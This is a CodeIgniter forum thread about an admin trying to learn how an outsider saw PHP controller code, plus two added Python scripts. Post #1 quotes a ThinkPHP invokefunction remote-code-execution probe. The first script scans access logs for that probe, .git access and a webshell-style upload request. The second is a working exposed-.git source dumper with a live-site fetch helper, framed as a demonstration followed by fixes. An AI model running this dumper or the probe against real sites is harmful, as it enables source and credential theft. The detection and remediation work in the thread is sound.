security vulnerability - being able to see your PHP FILE CODE?
#1
(This post was last modified: 08-05-2020, 05:35 AM by shez1983.)

So I received an email from someone who seems to be a good/ethical hacker.

He has given a screenshot of the code (controller file) he could see.

So I joined the company, who were using CI3. I am not a hacker and don't have that expertise, so I have been looking at the access logs to see any funny URLs being accessed, and I found a few, but when I pasted them into the browser it was all OK: I got a forbidden error.

I have also looked at the CI3 vulnerability lists/exploits, but there wasn't an example of how the exploit works (I found two related to my problem, i.e. viewing PHP files). Not sure what the next steps are?

The enable query config is set to false.

In the access log the one funky URL I found is this:
"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1"

But I tried it by adding it to the end of my domain, and no luck.

So one thing I found was that the .git folder was accessible. Not sure if that is what it was? So if anyone still knows of a way to see PHP code via CI3, i.e. domain.com/index.php?sss..., so I can be sure.
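Added example, not part of this thread and not the poster's logs: a Python 3 script that does the access-log review described in the post automatically. It parses combined-format lines (the default for Apache and the usual Nginx format) and flags the request patterns that come up in this thread: the ThinkPHP invokefunction probe, anything under /.git/, direct requests for PHP source under CodeIgniter's application/ or system/ directories, and PHP executed from an upload directory. It also records whether the server answered 200 or refused the request, which is the difference between "someone tried" and "someone got it". The lines in SAMPLE_LOG are constructed (the first one reproduces the request quoted above); the rule names, the upload-directory names and the IP addresses are my own choices.

```python
"""Triage of a combined-format web access log for the request patterns
discussed in this thread.  Sample log lines are constructed, not taken
from the poster's server."""
import re
from typing import Dict, List

# Combined log format: ip ident user [time] "METHOD TARGET PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) \S+'
)

# Rule name -> pattern matched against the request target (path + query string).
# Order matters: the first matching rule is reported for a line.
RULES = [
    # ThinkPHP 5.x RCE probe: routes the request to \think\app::invokefunction with
    # call_user_func_array.  Apache logs each backslash as "\\", Nginx as "\x5C".
    ("thinkphp-invokefunction-rce",
     re.compile(r"think(?:\\|\\x5c)+app/invokefunction|call_user_func_array", re.I)),
    # Any request into the repository metadata directory.
    ("git-directory-access", re.compile(r"(^|/)\.git(/|$)")),
    # PHP source requested directly, bypassing index.php (CI3 routes everything through it).
    ("direct-php-source-request", re.compile(r"^/(application|system)/.*\.php(\?|$)", re.I)),
    # A PHP file executed from a user-upload location (assumed directory names).
    ("php-under-upload-dir", re.compile(r"^/(uploads?|files|media)/.*\.php(\?|$)", re.I)),
]


def triage(log_text: str) -> List[Dict]:
    """Return one finding per log line that matches a rule.

    `served` is True when the server answered 200: for a .git path that means the
    repository really is exposed and for the PHP-source rule it means the web server
    is handing out code; 403/404 means the request was refused."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format (truncated or foreign line): skip it
        target, status = m.group("target"), int(m.group("status"))
        for rule, pattern in RULES:
            if pattern.search(target):
                findings.append({
                    "line": lineno,
                    "ip": m.group("ip"),
                    "rule": rule,
                    "target": target,
                    "status": status,
                    "served": status == 200,
                })
                break
    return findings


# Constructed sample log (addresses from the RFC 5737 documentation ranges).
# The first line reproduces the request quoted in post #1.
SAMPLE_LOG = r"""203.0.113.7 - - [05/Aug/2020:03:11:02 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 403 199 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Aug/2020:03:11:05 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Aug/2020:03:11:06 +0000] "GET /.git/config HTTP/1.1" 200 137 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Aug/2020:03:11:09 +0000] "GET /application/controllers/Pages.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"
198.51.100.4 - - [05/Aug/2020:03:12:44 +0000] "GET /index.php/pages/view/home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Aug/2020:03:13:30 +0000] "GET /uploads/avatar.php?cmd=id HTTP/1.1" 200 44 "-" "Mozilla/5.0"
this line is not in combined format and is skipped
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        state = "SERVED (200)" if f["served"] else f"refused ({f['status']})"
        print(f"line {f['line']:>2} {f['ip']:<13} {f['rule']:<28} {state:<14} {f['target']}")
```

Run it against the real file with `triage(open("/var/log/apache2/access.log").read())` and sort the findings by `served` first: a 403 on the ThinkPHP probe is just background scanner noise (the same request is sprayed at every host on the internet, whether or not ThinkPHP is installed), but a 200 on /.git/HEAD or on a PHP file under an upload directory is the thing to chase.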
#2

Well, guess what: I threw that line into Google Search and this is what came back.

THINKPHP REMOTE CODE EXECUTION BUG IS ACTIVELY BEING EXPLOITED
What did you Try? What did you Get? What did you Expect?

Joined CodeIgniter Community 2009.  ( Skype: insitfx )
#3

I don't have ThinkPHP installed. That was the only 'suspicious' URL in the access log, which, as I mentioned, I tried and got a forbidden error. So clearly someone thought I had ThinkPHP or whatever, but I don't.
#4

Do you have an upload function on your website? Maybe he uploaded an injected PHP file and got access to your files that way.
If you can't see the PHP code when accessing e.g. /application/controllers/Pages.php, your Apache/Nginx is configured correctly.

If he could download all the files in your .git folder, that means he got all your source code. Here you can find an article about it:
https://medium.com/swlh/hacking-git-dire...e60fa79a36

Accessing PHP files from index.php? depends on how your application was developed and what version of CodeIgniter you have. CI 3.1.3 has some nasty bugs.
https://codeigniter.com/userguide3/chang...sion-3-1-3
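Added example, not part of this thread and not from the linked article: a Python 3 script showing why an accessible .git folder means the whole source tree, which is what the original poster wanted to be sure about. It walks the repository the way git itself reads it, HEAD, then the branch ref, then the commit, tree and blob objects, fetching only files at well-known paths, so it works even when directory listing is disabled. The repository it reads is constructed in memory with git's real loose-object encoding (no git binary needed), with a made-up controller and a made-up database.php secret; the function names, the `fetch` callback shape and the `http_fetch` helper are my own design.

```python
"""What an exposed .git directory gives away: HEAD -> ref -> commit -> tree -> blobs.
The repository below is constructed in memory; `fetch` is any callable that
returns the bytes of a path under /.git/."""
import hashlib
import re
import urllib.request
import zlib
from typing import Callable, Dict, List, Tuple

Fetch = Callable[[str], bytes]


def _store(repo: Dict[str, bytes], kind: str, body: bytes) -> str:
    """Write one loose object: '<kind> <size>' NUL <body>, zlib-compressed, keyed by SHA-1."""
    raw = f"{kind} {len(body)}".encode() + b"\0" + body
    sha = hashlib.sha1(raw).hexdigest()
    repo[f"objects/{sha[:2]}/{sha[2:]}"] = zlib.compress(raw)
    return sha


def build_constructed_repo() -> Dict[str, bytes]:
    """A tiny CodeIgniter-shaped repository (constructed sample, not real code or secrets)."""
    repo: Dict[str, bytes] = {}
    pages = _store(repo, "blob", b"<?php\nclass Pages extends CI_Controller {\n"
                                 b"    public function view($page = 'home') { $this->load->view('pages/' . $page); }\n}\n")
    dbcfg = _store(repo, "blob", b"<?php\n$db['default']['password'] = 'constructed-example-secret';\n")
    controllers = _store(repo, "tree", b"100644 Pages.php\0" + bytes.fromhex(pages))
    config = _store(repo, "tree", b"100644 database.php\0" + bytes.fromhex(dbcfg))
    application = _store(repo, "tree", b"40000 config\0" + bytes.fromhex(config)
                                       + b"40000 controllers\0" + bytes.fromhex(controllers))
    root = _store(repo, "tree", b"40000 application\0" + bytes.fromhex(application))
    commit = _store(repo, "commit", (f"tree {root}\n"
                                     "author Dev <dev@example.invalid> 0 +0000\n"
                                     "committer Dev <dev@example.invalid> 0 +0000\n\ninitial\n").encode())
    repo["HEAD"] = b"ref: refs/heads/master\n"
    repo["refs/heads/master"] = (commit + "\n").encode()
    return repo


def read_object(fetch: Fetch, sha: str) -> Tuple[str, bytes]:
    """Fetch and inflate one loose object, returning (kind, body)."""
    raw = zlib.decompress(fetch(f"objects/{sha[:2]}/{sha[2:]}"))
    header, _, body = raw.partition(b"\0")
    kind, size = header.decode().split(" ")
    if int(size) != len(body):
        raise ValueError(f"corrupt object {sha}")
    return kind, body


def parse_tree(body: bytes) -> List[Tuple[str, str, str]]:
    """Tree entries are '<mode> <name>' NUL followed by a raw 20-byte SHA-1."""
    entries, i = [], 0
    while i < len(body):
        sp = body.index(b" ", i)
        nul = body.index(b"\0", sp)
        entries.append((body[i:sp].decode(), body[sp + 1:nul].decode(), body[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries


def dump_source(fetch: Fetch) -> Dict[str, bytes]:
    """Recover every file of the HEAD commit as {path: contents}."""
    head = fetch("HEAD").decode().strip()
    commit_sha = fetch(head[5:]).decode().strip() if head.startswith("ref: ") else head
    kind, body = read_object(fetch, commit_sha)
    if kind != "commit":
        raise ValueError("HEAD does not point at a commit")
    tree_sha = re.match(rb"tree ([0-9a-f]{40})", body).group(1).decode()
    files: Dict[str, bytes] = {}

    def walk(sha: str, prefix: str) -> None:
        for mode, name, child in parse_tree(read_object(fetch, sha)[1]):
            if mode in ("40000", "040000"):        # subdirectory
                walk(child, f"{prefix}{name}/")
            else:                                   # regular file or symlink blob
                files[prefix + name] = read_object(fetch, child)[1]

    walk(tree_sha, "")
    return files


def http_fetch(base_url: str) -> Fetch:
    """Fetch callable for a live site, e.g. dump_source(http_fetch("https://example.invalid")).
    Only use against a site you are authorised to test."""
    def fetch(path: str) -> bytes:
        with urllib.request.urlopen(f"{base_url.rstrip('/')}/.git/{path}", timeout=10) as resp:
            return resp.read()
    return fetch


if __name__ == "__main__":
    repo = build_constructed_repo()
    for path, content in sorted(dump_source(repo.__getitem__).items()):
        print(f"== {path} ({len(content)} bytes)")
        print(content.decode())
```

Two caveats. First, this only follows loose objects and a plain ref file; a repository whose refs are in packed-refs or whose objects sit in a .pack file makes `fetch` fail with a 404 (KeyError on the in-memory copy), and the tooling in the article above handles those too, so a failure here does not mean you are safe. Second, nothing about the web server is special: the single quickest check is `curl -s https://yourdomain/.git/HEAD`; if that prints `ref: refs/heads/...` the repository is readable. The fix is to deny everything under /.git at the web server and to deploy without the .git folder, and since the database credentials in application/config/ were part of the leak, rotate them.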